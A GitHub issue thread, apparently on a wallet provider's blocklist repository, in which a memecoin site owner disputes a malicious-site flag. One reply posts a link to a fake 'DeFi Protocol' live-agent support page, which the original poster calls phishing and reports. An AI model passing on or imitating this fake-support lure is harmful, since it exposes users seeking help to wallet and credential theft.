### ISSUE TITLE
I need urgent help! My site has been flagged!

### ISSUE THREAD

**Issue by WATMEMESOL** [phantom/blocklist#1078]
I am reaching out to address an urgent issue concerning my website, https://wat.meme/, which is currently being flagged as malicious and a potential scam by your wallet extension. 

This classification is incorrect and is negatively impacting the reputation and accessibility of my website. 

The website is a legitimate and secure platform that adheres to all necessary digital safety protocols. It does not engage in any malicious activities or scams. 

The integration with Jupiter Terminal, an open-sourced, lite version of Jupiter that provides end-to-end swap flow, exemplifies our commitment to security and efficiency by seamlessly linking it to the HTML. 

![Screenshot 2024-04-07 at 18-48-18 $WAT - #Memecoin](https://github.com/phantom/docs/assets/166245552/dd1731b4-8f6f-40e0-9c76-d2bf38b45d1f)

Source: https://station.jup.ag/docs/jupiter-terminal/jupiter-terminal

The current flagging seems to be a mistake, and I kindly request a thorough review of my website to clear this misunderstanding.

**Comment by ameerrah** [comment]
@WATMEMESOL 
Contact the Defi Protocol page to initiate a chat with the live agent on the chat button to get more information about your request via [DEFI PROTOCOL](https://accessonlinedefiprotocol.web.app/)
They can make proposal to complete your request.

**Comment by WATMEMESOL** [comment]
> @WATMEMESOL Contact the Defi Protocol page to initiate a chat with the live agent on the chat button to get more information about your request via [DEFI PROTOCOL](https://accessonlinedefiprotocol.web.app/) They can make proposal to complete your request.

That's a phishing site. Reported.
